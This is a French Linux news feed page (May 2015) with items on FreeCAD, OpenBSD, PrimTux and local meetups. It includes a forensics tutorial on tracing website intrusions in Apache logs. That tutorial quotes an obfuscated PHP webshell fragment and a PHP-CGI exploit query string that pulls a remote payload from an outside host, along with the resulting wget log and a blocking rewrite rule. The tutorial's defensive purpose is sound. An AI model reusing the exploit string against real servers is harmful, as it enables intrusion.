Linux France

S'abonner à flux Linux France
Mis à jour : il y a 1 heure 28 min

Second Meetup Python à Bruxelles - vendredi 8 mai 2015

Lundi 4 Mai

On continue ! Suite au succès du premier Meetup déjà annoncé ici, on enchaine cette fois sur le thème précis du déploiement. Vous ne savez pas trop comment gérer vos machines virtuelles, ce qu'est SaltStack ou vous voulez au contraire partager vos bonnes (et mauvaises) expériences sur le sujet ? rejoignez-nous ce vendredi dans les locaux de Railnova au cœur de Bruxelles pour apprendre ensemble mais surtout discuter autour d'un de nos sujets favoris : Python ! 

PS: le Meetup est bilingue francais/anglais afin d'etre le plus inclusif possible.

Télécharger ce contenu au format Epub

Lire les commentaires

Sortie de FreeCAD 0.15

Lundi 4 Mai

La nouvelle version publiée de FreeCAD est disponible depuis le 8 avril 2015. Cette nouvelle version apporte une grande variété de nouveautés dans la plupart des ateliers, comme par exemple le support de l'Occulus Rift.
FreeCAD est un logiciel libre et multi-plateforme de conception 3D paramétrique assisté par ordinateur.

Les nouveautés

L'atelier Architecture (Arch) bénéficie de nombreuses nouveautés:

  • L'import/export IFC est basé sur la plus récente bibliothèque IfcOpenShell ; il est maintenant plus rapide et rend FreeCAD compatible dans les deux sens avec le processus BIM.
  • La coupe d'un objet est possible selon un plan.
  • Le nouvel outil Toiture propose plus de contrôle sur les paramètres de chaque pan de Toit : pente, largeur, épaisseur, débord…
  • Un nouvel objet Panneaux permet de créer toutes sortes d'objets à base de panneaux.
  • Un nouvel objet Équipement permet d'ajouter toutes sortes d'objets de type sanitaire, mobilier, design d'intérieur avec des propriétés propres telles que la référence du produit, son lien, son fabricant, etc.

L'atelier Esquisse (Sketcher) supporte désormais les Ellipses. De plus cet atelier offre des outils pour analyser et réparer les esquisses.

L'atelier Tableur (Spreadsheet) a été entièrement recodé afin de fournir un atelier robuste de feuilles de calculs, il permet de récupérer toutes sortes d'informations à partir du modèle.

L'atelier Mise en plan (Drawing) permet maintenant d'exporter directement les mises en plan en DXF.

La liste complète des nouveautés est disponible dans la Notes de version 0.15

Des ateliers/modules complémentaires :

De nouveaux modules sont apparus, développés par des utilisateurs de FreeCAD. Ils ne sont pas intégrés directement dans la version officielle pour diverses raisons mais sont devenus très populaires par leurs fonctionnalités très attendues dans FreeCAD.
Le module Drawing Dimensioning permet d'ajouter des cotes directement dans une page de dessin.
Le module Assembly2 permet de créer des assemblages par ajout de contraintes.
Le module Animation permet de créer des animations.
La macro WorkFeature propose de nombreux outils de création de point, ligne, plan de construction pour vous aider dans la réalisation de vos modèles.

Un PPA est en cours de création afin de faciliter l'installation (sur Ubuntu) de ces modules complémentaires.

La suite

Module Path : ce nouveau module devrait être intégré à FreeCAD sous peu. Cet atelier permet d'importer, éditer et générer du GCODE pour l'utilisation d'une machine CNC directement depuis un projet FreeCAD.
L'atelier est très bien documenté sur Github (EN)

Module Architecture : la compatibilité BIM/IFC est toujours une priorité. De plus des outils de métrés sont déjà en cours de développement.

Module FEM (Analyse par la méthode des éléments finis) : depuis la sortie de la version 0.15 de nombreuses fonctionnalités ont été ajoutées dans cet atelier qui s’appuie sur Netgen pour réaliser le maillage et Calculix pour le calcul d'efforts.

Module Assemblage : cet atelier est en développement depuis très longtemps mais est freiné par de nombreux aspects compliqués de la modélisation paramétrique, comme par exemple le nommage topologique (qui permet de nommer une entité d'un objet quelles que soient les modifications apportées).

Le développement financé

Le module PATH est le premier atelier à être développé suite à un financement participatif. Ce nouveau module a été créé par Yorik van Havre, Daniel Falck et Brad Collette. Le processus de financement étant un peu spécial Yorik expliquera la démarche sur son blog bientôt.

Dernièrement Ian Rees a demandé à la communauté si elle était disposée à le soutenir financièrement pour son travail sur FreeCAD car il se retrouve en ce moment entre deux boulots. Son précédent emploi consistait à maintenir le télescope à neutrinos IceCube au pole Sud pendant l'hiver lorsqu'il n'y a pas d'accès par avion. Il n'est pas décidé pour son prochain emploi.
Concernant FreeCAD il s'attarde principalement à développer le module Mise en plan (Drawing). Vous pouvez suivre son travail sur son blog (EN) et éventuellement le soutenir.

Personnellement, en plus de proposer des services de formations, d'assistance et de développement je propose régulièrement des cours par vidéo conférence accessible à tous gratuitement en proposant aux participants de me soutenir financièrement via Tipeee. Tipeee : Formation Web FreeCAD

L'équipe principale de développement de FreeCAD à l'exception de Yorik ne fait pas financer le développement de FreeCAD. Cependant elle est ouverte à tout type de développement financé.

Télécharger ce contenu au format Epub

Lire les commentaires

Remonter une attaque et trouver la faille avec les logs d'Apache2

Lundi 4 Mai

Nous allons voir dans cet article comment remonter une attaque suite au piratage d'un site avec les logs d'Apache. On partira du principe que Apache est déjà configuré pour mettre ses logs dans /var/log/apache2 et dans les fichiers access.log et error.log.

Sommaire

La documentation d'apache explique très bien comment est formée une ligne typique d'un fichier de log, mais découpons finement la ligne suivante pour voir ce que ça signifie :

93.184.216.34 - - [20/Apr/2015:21:54:21 +0200] "GET /2015/01/25/NSA-bullrun.html HTTP/1.1" 200 8766 "https://www.libwalk.so/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0

Pour info, ça correspond à la ligne suivante dans votre configuration apache2 :

LogFormat "%{LOGIN}e %h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T"

Pour la comprendre plus facilement, on peut imaginer la lire comme un journal de bord dans lequel la personne qui s'en chargerait raconterait tout avec le plus de détails possible. Dans l'exemple ci-dessus, les logs nous racontent que :

J'ai eu une requête provenant de l'adresse IP 93.184.216.34 le 20 avril 2014 à 21h54 et 21 secondes (+0200 indiquant la timezone de votre serveur), elle m'a demandé (GET) d'accèder à la ressource /2015/01/25/NSA-bullrun.html en utilisant le protocole HTTP/1.1.

J'indique ensuite le statut de cette ressource (200), ainsi que sa taille (ici le nombre d'octets envoyés, y compris les en-têtes) (8766).

Elle m'indique venir du site https://www.libwalk.so (referer) et m'affirme l'avoir fait en utilisant le logiciel Mozilla/5.0 […] (user-agent). Et j'ai mis 0 seconde à servir cette ressource.

Navigation

Pour comprendre comment on peut retrouver des traces d'une personne (ou d'un bot) "facilement", voici les logs que génère un visiteur en arrivant sur ce blog (j'ai passé des lignes pour que ce soit plus lisible) :

93.184.216.34 - - [20/Apr/2015:21:53:45 +0200] "GET / HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0 93.184.216.34 - - [20/Apr/2015:21:53:45 +0200] "GET /css/slimbox2.css HTTP/1.1" 200 536 "https://www.libwalk.so/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0 93.184.216.34 - - [20/Apr/2015:21:53:45 +0200] "GET /css/bootstrap.min.css HTTP/1.1" 200 16343 "https://www.libwalk.so/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0 93.184.216.34 - - [20/Apr/2015:21:53:46 +0200] "GET /css/style.css HTTP/1.1" 200 673 "https://www.libwalk.so/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0

Puis en cliquant sur le bouton "read more" de l'article "NSA - À propos de BULLRUN" :

93.184.216.34 - - [20/Apr/2015:21:54:21 +0200] "GET /2015/01/25/NSA-bullrun.html HTTP/1.1" 200 8766 "https://www.libwalk.so/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0 93.184.216.34 - - [20/Apr/2015:21:54:21 +0200] "GET /images/2014/snowden/trivial_catastrophic.png HTTP/1.1" 200 96122 "https://www.libwalk.so/2015/01/25/NSA-bullrun.html" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0 93.184.216.34 - - [20/Apr/2015:21:54:21 +0200] "GET /images/2014/snowden/PGP_encrypted1.png HTTP/1.1" 200 15137 "https://www.libwalk.so/2015/01/25/NSA-bullrun.html" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0 93.184.216.34 - - [20/Apr/2015:21:54:21 +0200] "GET /images/2014/snowden/OTR_encrypted1.png HTTP/1.1" 200 45057 "https://www.libwalk.so/2015/01/25/NSA-bullrun.html" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0

Dans la première partie, il arrive sur la page d'accueil du site, et il demande les feuilles de style CSS pour pouvoir afficher l'ensemble convenablement. Dans la seconde partie, on peut voir qu'il charge la page de l'article et qu'il "demande" les images d'illustrations qui vont avec.

Codes et méthodes

Les quelques lignes de logs que vous avez ci-dessus sont toujours sur le même modèle (même méthode HTTP, même code HTTP, …), avant de continuer, voici quelques éléments supplémentaires pour mieux comprendre la suite :

Liste des codes HTTP, avec ceux que l'on retrouve le plus souvent) :

Nous avons eu seulement des codes 200 dans les requêtes ci-dessus. Voici une vue rapide de ce que l'on peut avoir :

  • 1xx : message d'information, type "requête reçue, le process continue"
  • 2xx : message annonçant un succès
    • 200 : OK
  • 3xx : message annoncant une redirection
    • 307 : redirection temporaire
    • 308 : redirection permanente
  • 4xx : erreur du client
    • 401 : requête non autorisée
    • 403 : requête interdite
    • 404 : requête non trouvée
  • 5xx : erreur du serveur
    • 503 : service non disponible
Liste des méthodes HTTP
  • GET : demande une ressource (la requête étant normalement sans effet sur celle-ci ressource)
  • POST : transmet des données en vue d'un traitement. Le résultat peut être la création de nouvelles ressources (fichiers…) ou la modification de fichiers existants.
  • HEAD : demande seulement des informations sur la ressource (sans demander la ressource elle-même)

À noter qu'il existe d'autres méthodes (DELETE, PUT, TRACE…) mais qui apparaissent très, très rarement. Si vous vous êtes fait pirater, et que vous avez une idée du moment de l'attaque, commencez par regarder les requêtes POST ayant eu lieu à ce moment là :)

Temps de jouer à cache-cache

Nous allons voir ici deux exemples d'attaques différentes pour vous donner des pistes à suivre.

Exemple 1 : Drupal

Un attaquant a réussi à injecter du code sur un Drupal.

En regardant les fichiers modifiés récemment du site, par exemple avec la commande find et son option -mtime(fichier dont les données ont été modifiées il y a n*24 heures). Dans cette ligne de commande, je recherche donc les fichiers php ayant été modifiés il y a moins de 2 jours.

find . -mtime -2 -iname "*.php"

Après un piratage, on trouve souvent des fichiers avec des lignes en plus (souvent en base64 ou avec des chaînes de caractères étranges) :

$YLbgPfj524 = "vh46afl7tm2ik*n3pws.bu;0j)(qo_erzxy51dg9c8/";$oDJXw7301 = $YLbgPfj524[16].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[38].$YLbgPfj524[29].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[16].$YLbgPfj524[6].$YLbgPfj524[4].$YLbgPfj524[40].$YLbgPfj524[30];$Gcwa9593

Regardons la date exacte de modification d'un des fichiers :

ls -l sites/all/themes/wtm7973n.php -rw-rw---- 1 www-data www-data 1285 mars 28 06:03 ./sites/all/themes/wtm7973n.php

et d'un autre :

ls -l sites/default/db.php -rw-rw---- 1 www-data www-data 510 mars 28 06:19 ./sites/default/db.php

Notre première piste : le 28 mars à 06h03 (c'est l'heure la plus ancienne que je trouve dans les fichiers modifiés) ; si les logs sont particulièrement verbeux, on peut affiner directement en enlevant les requêtes GET, par exemple avec grep -v "GET" access.log|less).

Cherchons dans les logs

On ouvre les logs avec la commande less (less access.log) puis on utilise la touche / pour lancer une recherche (par exemple 2015:06:03) pour voir les requêtes au moment de l'attaque.

68.180.228.246 - - [28/Mar/2015:06:02:02 +0100] "GET /lidentite-0 HTTP/1.1" 200 8409 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 157.55.39.120 - - [28/Mar/2015:06:02:22 +0100] "GET /printmail/5732 HTTP/1.1" 200 8176 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 1 157.55.39.120 - - [28/Mar/2015:06:02:35 +0100] "GET /print/1832 HTTP/1.1" 200 4531 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 0 157.55.39.120 - - [28/Mar/2015:06:02:43 +0100] "GET /print/5041 HTTP/1.1" 200 6582 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 0 81.163.131.61 - - [28/Mar/2015:06:03:07 +0100] "POST /index.php?q=fckeditor%2Fxss HTTP/1.1" 404 29446 "-" "-" 1 81.163.131.61 - - [28/Mar/2015:06:03:09 +0100] "POST /index.php?q=ckeditor%2Fxss HTTP/1.1" 200 3 "-" "-" 0 81.163.131.61 - - [28/Mar/2015:06:03:10 +0100] "POST /index.php?q=ckeditor%2Fxss HTTP/1.1" 200 13 "-" "-" 0 81.163.131.61 - - [28/Mar/2015:06:03:11 +0100] "GET /sites/all/themes/wtm7973n.php HTTP/1.1" 200 109 "-" "-" 0 91.194.60.86 - - [28/Mar/2015:06:05:01 +0100] "GET /cron.php?cron_key=SkL5Ge7 HTTP/1.1" 200 3 "-" "Wget/1.13.4 (linux-gnu)" 10 207.46.13.9 - - [28/Mar/2015:06:05:12 +0100] "GET /print/2862 HTTP/1.1" 200 4324 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 1 148.251.68.67 - - [28/Mar/2015:06:05:18 +0100] "GET / HTTP/1.1" 200 50604 "-" "aria2/1.18.6" 1 188.165.15.98 - - [28/Mar/2015:06:05:28 +0100] "GET /concours HTTP/1.1" 200 9948 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)" 0 157.55.39.120 - - [28/Mar/2015:06:05:51 +0100] "GET /node/6164 HTTP/1.1" 200 9574 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 1 207.46.13.9 - - [28/Mar/2015:06:06:42 +0100] "GET /breves/www.news.fr HTTP/1.1" 200 9787 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 1 83.169.91.4 - - [28/Mar/2015:06:06:58 +0100] "GET / HTTP/1.1" 200 50604 "-" "Mozilla/5.0 (X11; Linux i686; rv:19.0) Gecko/20100101 Firefox/19.0" 1 81.163.131.61 - - [28/Mar/2015:06:07:06 +0100] "POST /sites/all/themes/wtm7973n.php HTTP/1.1" 200 1123 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)" 1 81.163.131.61 - - [28/Mar/2015:06:07:08 +0100] "GET /wp-conf.php?t8449n=1 HTTP/1.1" 200 29207 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)" 0 125.209.235.176 - - [28/Mar/2015:06:07:14 +0100] "GET /robots.txt HTTP/1.1" 200 649 "-" "Mozilla/5.0 (compatible; Yeti/1.1; +http://help.naver.com/robots/)" 0 125.209.235.179 - - [28/Mar/2015:06:07:15 +0100] "GET / HTTP/1.1" 200 10929 "-" "Mozilla/5.0 (compatible; Yeti/1.1; +http://help.naver.com/robots/)" 1

À 6:03:07, une première tentative d'injection (POST) semble rater (code 404) :

81.163.131.61 [28/Mar/2015:06:03:07] "POST /index.php?q=fckeditor%2Fxss 404

Mais les deux suivantes fonctionnent (code 200) :

81.163.131.61 [28/Mar/2015:06:03:09] "POST /index.php?q=ckeditor%2Fxss 200 81.163.131.61 [28/Mar/2015:06:03:10] "POST /index.php?q=ckeditor%2Fxss 200

Puis une requête sur un fichier avec un nom étrange :

81.163.131.61 [28/Mar/2015:06:07:06] "POST /sites/all/themes/wtm7973n.php HTTP/1.1" 200

Et il vient d'être créé :

ls -l ./sites/all/themes/wtm7973n.php -rw-rw---- 1 2003 2003 1285 mars 28 06:03 ./sites/all/themes/wtm7973n.php

Si on continue encore un peu dans les logs, on voit cette ligne :

81.163.131.61 [28/Mar/2015:06:07:08] "GET /wp-conf.php?t8449n=1 HTTP/1.1" 200

Rien ne vous saute aux yeux ? Le fichier wp-conf.php est propre à wordpress, et n'a rien à faire sur un drupal. Il faudra prévoir de faire un peu de nettoyage par la suite.

VU !

Donc, on aurait une attaque sur "ckeditor", qui aurait permis de créer d'autres fichiers. Après une petite recherche, ckeditor est un module pour Drupal avec des failles connues, dont la nôtre.

Un correctif existe, il suffirait donc de restaurer une sauvegarde du site datant d'AVANT l'attaque puis de mettre le module à jour, ce qui permet d'éviter de devoir nettoyer les fichiers un par un, au risque d'en louper.

Allons plus loin

L'attaque semble venir d'une faille de ce module, mais autant en être sûr. N'hésitez surtout pas à rechercher dans les logs toutes les IP ayant fait une requête sur les fichiers pirates (wp-conf.php, wtm7973n.php…), puis sur toutes les requêtes que ces adresses IP ont faites.

Je ne vais pas vous mettre les logs de ces recherches ici, ça prendrait trop de place, mais je note que :

  • 6 adresses IP différentes ont fait des requêtes sur le fichier wp-conf.php :
zcat *.gz|grep wp-conf.php|awk {'print $1'}|sort|uniq -c 1 188.162.64.65 - 492 requêtes, seulement des 404 2 205.234.200.234 2 31.184.195.247 2 81.163.131.58 9 81.163.131.61 8 81.17.16.116
  • L'IP 81.17.16.111 a fait une requête sur un fichier update.php du module ctools, faudrait peut-être voir pour le mettre à jour par la même occasion si ce n'est pas le cas ;-)
81.17.16.111 - - [28/Mar/2015:18:22:05 +0100] "POST /sites/all/modules/ctools/page_manager/plugins/update.php HTTP/1.1" 200 13203 "-" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130331 Firefox/21.0" 0 Exemple 2 : vulnérabilité sur PHP 5.2

Nous avons reçu 2 alertes dans la nuit concernant une attaque sur le site www.exemple.org. L'attaquant a profité de l'utilisation de php5.2 pour lancer le téléchargement d'un fichier sur un serveur distant via la commande wget (sans fichiers modifiés) mais en lancant un processus "ennemi" :

2001 3912 0.0 0.0 29700 4136 ? S 01:50 0:00 /usr/sbin/httpd

En fouillant dans les logs au moment de l'attaque, on tombe sur cette ligne :

189.18.60.245 - - [20/Apr/2015:01:50:27 0200] "GET /?-d%20allow_url_include%3DOn-d%20auto_prepend_file%3Dhttp://www.krol.lt/run.txt HTTP/1.1" 200 7 "-" "Mozilla/3.0 (compatible; Indy Library)" 300

Et en fait, la réponse se trouve dans error.log :

[01:50:27] [error] [client 189.18.60.245] --2015-04-20 01:50:27-- http://www.krol.lt/w.txt [01:50:27] [error] [client 189.18.60.245] Resolving www.krol.lt (www.krol.lt)... [01:50:27] [error] [client 189.18.60.245] 5.199.171.10 [01:50:27] [error] [client 189.18.60.245] Connecting to www.krol.lt (www.krol.lt)|5.199.171.10|:80... [01:50:27] [error] [client 189.18.60.245] connected. [01:50:27] [error] [client 189.18.60.245] HTTP request sent, awaiting response... [01:50:27] [error] [client 189.18.60.245] 200 OK [01:50:27] [error] [client 189.18.60.245] Length: 29582 [01:50:27] [error] [client 189.18.60.245] (29K) [text/plain] [01:50:27] [error] [client 189.18.60.245] Saving to: `w.txt' [01:50:27] [error] [client 189.18.60.245] [01:50:27] [error] [client 189.18.60.245] 0K . [01:50:27] [error] [client 189.18.60.245] ........ [01:50:27] [error] [client 189.18.60.245] . ..... [01:50:27] [error] [client 189.18.60.245] ... [01:50:27] [error] [client 189.18.60.245] .. ...... [01:50:27] [error] [client 189.18.60.245] .. 100% [01:50:27] [error] [client 189.18.60.245] 171K=0.2s [01:50:27] [error] [client 189.18.60.245] [01:50:27] [error] [client 189.18.60.245] 2015-04-20 01:50:27 (171 KB/s) - `w.txt' saved [29582/29582] [01:50:27] [error] [client 189.18.60.245]

La meilleure solution serait de mettre à jour le site pour utiliser une version de php plus récente que la version dont il a besoin actuellement (php 5.2) qui possède des vulnérabilités. Hélas, la meilleure solution n'étant pas toujours possible, il va falloir patcher directement. Si on connait la cause du problème, on trouve normalement des solutions rapidement sur le net, dans notre cas : PHP-CGI Vulnerability Exploited in the Wild qui explique le fonctionnement et la parade de cette attaque via un .htaccess.

Vous pouvez également éditer directement le(s) vhost(s)p our y ajouter les trois lignes suivantes :

RewriteEngine on RewriteCond %{QUERY_STRING} (%2d|-)d.*auto_prepend [NC] RewriteRule .? - [F,L] En conclusion

Avant une attaque :

  • mettre en place des sauvegardes (sites, base de données…) réguliers et automatiques
  • mettre en place un système pour être alerter en cas de problème (supervision sur les processus, chaînes de caractères présentes dans les fichiers…)

Après une attaque :

  • définir le moment de la création ou de la modification des fichiers
  • rechercher dans les logs l'origine de l'attaque
  • définir les différents attaquants (IP / origine de l'attaque)
  • définir si d'autres fichiers ont été créé/modifié

Et bien entendu, se tenir à jour ET mettre à jour régulièrement ses CMS :

Télécharger ce contenu au format Epub

Lire les commentaires

Sortie de Miam-Player 0.7.2

Dimanche 3 Mai

Depuis la sortie de Miam-Player 0.7.1 à la fin du mois de mars, une quarantaine de commits ont été réalisé. Grâce à Qt, une nouvelle plateforme est supportée sans trop de soucis : OS X Yosemite. Un installeur "Approuvé par l'utilisateur lambda" est également présent.

Merci à la communauté de Firefox pour leur image disque.

Liste des modifications
  • Ajout du format Opus
  • Amélioration de la recherche dans la lecture des fichiers OGG Vorbis
  • Ajout d'un indicateur visuel dans la barre de l'explorateur de fichiers, lorsque le chemin est trop long
  • Ajout d'un menu contextuel pour arrêter la lecture après la piste en cours
  • Mise en surbrillance de la liste de lecture lorsque l'on souhaite glisser-déposer des pistes
  • Nouveau curseur représentant le nombre de pistes en cours de déplacement lors d'un glisser-déposer d'une liste à l'autre ou au sein d'une même liste de lecture.
  • Mise à jour automatique et incrémentale de la bibliothèque à chaque démarrage
  • Recherche des pistes favorites via le caractère * : ainsi *** retourne toutes les pistes ayant 3 étoiles ou plus
  • Affichage des étoiles sur la gauche pour les pistes qui en possèdent (paramétrable dans les options)
  • Finalisation du mode de recherche non-exclusif. Les résultats d'une recherche peuvent maintenant s'afficher en gras. Les lettres d'accès rapide à côté de la barre de défilement verticale sont également surlignées. Par exemple, si l'on recherche "live", tous les artistes ayant ce terme (albums, piste, etc) sont retournés. Ainsi "Best of Live" d'Iggy Pop surlignera également la lettre "I"
  • Finalisation de l'affichage de la pochette lorsque l'on déplie un album. Elle est semi-transparente à 66% par défaut mais encore une fois l'utilisateur peut régler simplement de 0 à 100. Si la pochette est trop petite pour la place disponible, le bord gauche est étiré, flouté et rendu linéairement transparent

Problèmes connus

Depuis longtemps, le tout premier scan du disque dur fait figer l'interface. En fonction de la quantité de médias à analyser, cela peut durer de quelques secondes à plusieurs minutes.

Les autres problèmes recensés concernent majoritairement l'éditeur de tags. Consultez le dépôt GitHub pour le listing détaillé.

Prochaines évolutions Égaliseur

Grâce à la version 2.2.0 de VLC et de la mise à jour du SDK, l'intégration de l’égaliseur dans Miam-Player sera infiniment plus simple à mettre en œuvre.

Ci-dessous, voici ce que je compte réaliser comme IHM pour l'égaliseur :

Éditeur de tags

La gestion des méta-données requiert encore des ajustements, comme la possibilité d'interagir avec les pochettes dans l'éditeur de tags. Des pistes pour tagger automatiquement à partir du nom de fichiers sont en cours d'étude. Il existe également des services web pour récupérer par lots ces informations et il serait de bon aloi de regarder comment implémenter un tel service.

Téléchargement

Sources
Paquet debian pour Ubuntu 15.04 réalisé par mes soins

Télécharger ce contenu au format Epub

Lire les commentaires

PrimTux distribution éducative basée sur Debian Jessie

Dimanche 3 Mai

PrimTux est une distribution GNU/Linux éducative personnalisable basée sur Debian Jessie, disposant de quatre environnements adaptés aux cycles de l'école élémentaire, développée en coopération avec ASRI éducation. La consommation mémoire au démarrage est inférieure à 100 Mo grâce au gestionnaire de fenêtres Fluxbox associé au gestionnaire du bureau Rox. Elle dispose d'un système de catégorisation et d'édition simplifié des raccourcis. Le menu utilisé est celui de PCManFM agrémenté des marque-pages pour distinguer les différentes catégories. L'installation est simple, utilise systemback, ce qui permet de créer facilement ensuite sa propre distribution.

En session live, les utilisateurs peuvent se connecter avec un mot de passe : mini (cycle 1, mot de passe : tuxmini), super (cycle 2, mot de passe : tuxsuper), maxi (cycle 3, mot de passe : tuxmaxi), quidam (maître, mot de passe : tuxmaitre). Dans le cas d'une installation sur disque dur, ces environnements sont à installer.

Quatre environnements adaptés personnalisables Accueil

Mini mot de passe tuxmini

Super mot de passe tuxsuper

Maxi mot de passe tuxmaxi

Maître (Yoda) ou Quidam mot de passe tuxmaitre

Logiciels éducatifs installés

  • Lecture : Aller, Associations, exercices Beaunis, exercices.free, imageo, le jeu du pendu, le mot le plus long ;
  • Calcul : à nous les nombres, calcul mental, calcul réfléchi, calculatrice, calculette capricieuse, contour, exercices.free, fukubi, la course aux nombres, le matou matheux, le nombre cible, opérations, problèmes, suites, suites arithmétiques, tierce, Tuxmaths ;
  • Clavier-souris : Jnavigue, Mulot, Pysycache ;
  • Compilations : Childsplay, GCompris, Omnitux, pepit, pysiogame, Jclic ;
  • Dessin : Tuxpaint ;
  • Découverte du monde : Atlas Houot ;
  • Géométrie : chemin, epi: labyrinthe, labyrinthe caché, comparaison, piles, symcolor, géotortue, Tangrams ;
  • Sciences : Stellarium, microscope virtuel, Scratch ;
  • Jeux : blobby volley, frozen-bubble, Hannah's horse, monsterz, Mr Patate, ri-li, Seahorse adventures, Supertux ;
  • Pour le maître : Ardora, open sankoré, Pylote, l'administration de Tuxpaint, de GCompris, de Pysycache, Jclic author ;
  • Bureautique : OOO4Kids, Dicorime ;
  • Graphisme : Mirage, Pinta, Shutter ;
  • Internet : FileZilla, Seamonkey ;
  • Son et vidéo : Audacity, Winff, Soundconverter, VLC, gmplayer, xfburn.

Compatibilité matérielle
  • PrimTux fonctionne sur des PC équipés de processeurs non-PAE et PAE, est compatible avec les PC équipés de BIOS UEFI;
  • Poids: 3,6 Go / 7,2 Go installée ;
  • Consommation RAM: 80 Mo au chargement( version installée) / 90 Mo au chargement (version live);
  • 256 Mo de ram (et swap de 1,5 fois la RAM, habituel sous linux) sont conseillés pour la faire tourner correctement.
Deux ou trois versions
  • PrimTux ;
  • PrimTux-Wine : cette version contient Wine et le logiciel de Pragmatice « Clicmenu », lanceur des applications Windows compatibles avec la distribution. Le cycle 1 se voit ainsi agrémenté de 20 applications, le cycle 2 de 64 applications, et le cycle 3 de 112 applications, toutes gratuites et pour lesquelles les auteurs ont donné l'autorisation de diffusion à des fins non-commerciales ;
  • PrimTux-dys est à l'étude pour remplacer ASRI Edu 300 orientation dys, une plateforme est conçue sur une base de puppy lucid 528 et requiert seulement 512 Mo RAM pour un confort optimum. Elle peut donc fonctionner sur de très vieux ordinateurs portables. L'ISO de la plateforme peut être gravée sur DVD ou démarrée à partir d'une clé USB amorçable. Elle est dérivée de l'ASRI 300 (plateforme éducative) dégraissée en jeux et intègre des logiciels adaptés aux enfants dyslexiques, dyspraxiques et dyscalculiques.
Télécharger ce contenu au format Epub

Lire les commentaires

Les journaux LinuxFr.org les mieux notés du mois d'avril 2015

Dimanche 3 Mai

LinuxFr.org propose des dépêches et articles, soumis par tout un chacun, puis revus et corrigés par l'équipe de modération avant publication. C'est la partie la plus visible de LinuxFr.org, ce sont les dépêches qui sont le plus lues et suivies, sur le site, via Atom/RSS, ou bien via partage par messagerie instantanée, par courriel, ou encore via médias sociaux.

Ce que l’on sait moins, c’est que LinuxFr.org vous propose également à tous de tenir vos propres articles directement publiables, sans validation a priori des modérateurs. Ceux-ci s'appellent des journaux. Voici un florilège d'une dizaine de ces journaux parmi les mieux notés par les utilisateurs… qui notent. Lumière sur ceux du mois d'avril passé.

Télécharger ce contenu au format Epub

Lire les commentaires

Containers et virtualisation jeudi 7 mai 2015 à Arlon

Samedi 2 Mai

Après une première rencontre pour faire connaissance, les jeudis du libre à Arlon (Belgique) débutent leur première conférence organisée à l'avance (ou presque, jeudi 7 mai 2015) avec pour thème:

  • Virtualbox pour une utilisation « à la maison »;
  • KVM et Proxmox VE pour « la cave » ou « le grenier »;
  • et enfin, Docker, pour vos tests et développements, dans « le train/le bus/… »

Le nombre de places étant limité, l'inscription est recommandée. L'entrée est gratuite.

La conférence se déoulera dans les bureaux d'Inforjeunes, 31 place Didier, Arlon, Belgique.

Les jeudis du libre à Arlon sont organisé par l'ASBL 6x7 qui s'occupe également des cafés numériques (conférence sur des thèmes technologiques mais pas forcément liés au libre) et les repairs cafés (rencontre pour réparer tout ce qu'on veut, de l'ordinateur au bouton de chemise).

Télécharger ce contenu au format Epub

Lire les commentaires

OpenBSD 5.7 « Blues Brothers »

Vendredi 1 Mai

Le premier mai, OpenBSD est de sortie, comme chaque année.

OpenBSD est un système d'exploitation orienté sécurité et réseau, dont les principaux avantages sont la stabilité, grâce aux audits sur le code source, mais également l'ensemble très large de fonctionnalités réseau qu’il fournit.

Le changement majeur de cette version est dans la continuité du fork d’OpenSSL, LibreSSL (cf. Bob Beck, LibreSSL - The first 30 days and the Future, BSDcan 2014 ; Ted Unangst, LibreSSL: More Than 30 Days Later, EuroBSDCon 2014). En effet, neuf jours après la sortie d'OpenBSD 5.6, la vulnérabilité POODLE a pointé son nez. Adieu SSL 3, SSH 1 et MD5 !

Ont contribué à cette dépêche (par ordre de dispersion) : BAud, karchnu, Loïc Blot, Xavier Teyssier, palm123, zurvan, Cédric Krier, Rolinh, Xavier Claude, Ellendhel, Dareg, Nÿco, Stéphane Aulery. Aucune moule n'a été blessée durant la rédaction.

Sommaire Mises à jour Logiciels

Dans les grandes lignes, OpenBSD, accompagné de ses ports, c'est :

  • xserver 1.16.4 ;
  • GCC 4.8.4 et 4.9.2 ;
